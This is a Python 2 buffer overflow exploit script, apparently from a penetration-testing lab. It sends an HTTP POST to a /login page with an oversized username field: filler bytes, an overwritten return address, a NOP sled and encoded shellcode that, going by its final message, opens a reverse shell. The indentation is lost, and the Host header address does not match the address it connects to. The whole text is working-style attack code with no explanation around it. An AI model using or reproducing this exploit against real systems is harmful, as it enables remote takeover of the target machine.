
#!/usr/bin/python
import socket
try:
print "\nSending evil buffer..."
shellcode = ("\xb8\x85\xe1\x5a\x96\xd9\xc3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x52\x31\x43\x12\x83\xeb\xfc\x03\xc6\xef\xb8\x63\x34\x07\xbe"
"\x8c\xc4\xd8\xdf\x05\x21\xe9\xdf\x72\x22\x5a\xd0\xf1\x66\x57"
"\x9b\x54\x92\xec\xe9\x70\x95\x45\x47\xa7\x98\x56\xf4\x9b\xbb"
"\xd4\x07\xc8\x1b\xe4\xc7\x1d\x5a\x21\x35\xef\x0e\xfa\x31\x42"
"\xbe\x8f\x0c\x5f\x35\xc3\x81\xe7\xaa\x94\xa0\xc6\x7d\xae\xfa"
"\xc8\x7c\x63\x77\x41\x66\x60\xb2\x1b\x1d\x52\x48\x9a\xf7\xaa"
"\xb1\x31\x36\x03\x40\x4b\x7f\xa4\xbb\x3e\x89\xd6\x46\x39\x4e"
"\xa4\x9c\xcc\x54\x0e\x56\x76\xb0\xae\xbb\xe1\x33\xbc\x70\x65"
"\x1b\xa1\x87\xaa\x10\xdd\x0c\x4d\xf6\x57\x56\x6a\xd2\x3c\x0c"
"\x13\x43\x99\xe3\x2c\x93\x42\x5b\x89\xd8\x6f\x88\xa0\x83\xe7"
"\x7d\x89\x3b\xf8\xe9\x9a\x48\xca\xb6\x30\xc6\x66\x3e\x9f\x11"
"\x88\x15\x67\x8d\x77\x96\x98\x84\xb3\xc2\xc8\xbe\x12\x6b\x83"
"\x3e\x9a\xbe\x04\x6e\x34\x11\xe5\xde\xf4\xc1\x8d\x34\xfb\x3e"
"\xad\x37\xd1\x56\x44\xc2\xb2\x98\x31\xbb\xdf\x71\x40\x43\xe1"
"\x3a\xcd\xa5\x8b\x2c\x98\x7e\x24\xd4\x81\xf4\xd5\x19\x1c\x71"
"\xd5\x92\x93\x86\x98\x52\xd9\x94\x4d\x93\x94\xc6\xd8\xac\x02"
"\x6e\x86\x3f\xc9\x6e\xc1\x23\x46\x39\x86\x92\x9f\xaf\x3a\x8c"
"\x09\xcd\xc6\x48\x71\x55\x1d\xa9\x7c\x54\xd0\x95\x5a\x46\x2c"
"\x15\xe7\x32\xe0\x40\xb1\xec\x46\x3b\x73\x46\x11\x90\xdd\x0e"
"\xe4\xda\xdd\x48\xe9\x36\xa8\xb4\x58\xef\xed\xcb\x55\x67\xfa"
"\xb4\x8b\x17\x05\x6f\x08\x27\x4c\x2d\x39\xa0\x09\xa4\x7b\xad"
"\xa9\x13\xbf\xc8\x29\x91\x40\x2f\x31\xd0\x45\x6b\xf5\x09\x34"
"\xe4\x90\x2d\xeb\x05\xb1")
filler = "A" * 780
eip = "\x83\x0c\x09\x10"
offset = "C" * 4
nops = "\x90" * 10
inputBuffer = filler + eip + offset + nops + shellcode
content = "username=" + inputBuffer + "&password=A"
buffer = "POST /login HTTP/1.1\r\n"
buffer += "Host: 10.11.0.22\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefo
x/52.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r
\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Referer: http://10.11.0.22/login\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: "+str(len(content))+"\r\n"
buffer += "\r\n"
buffer += content
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.169.157.10", 80))
s.send(buffer)
s.close()
print "\nDone did you get a reverse shell?"
except:
print "\nCould not connect!"
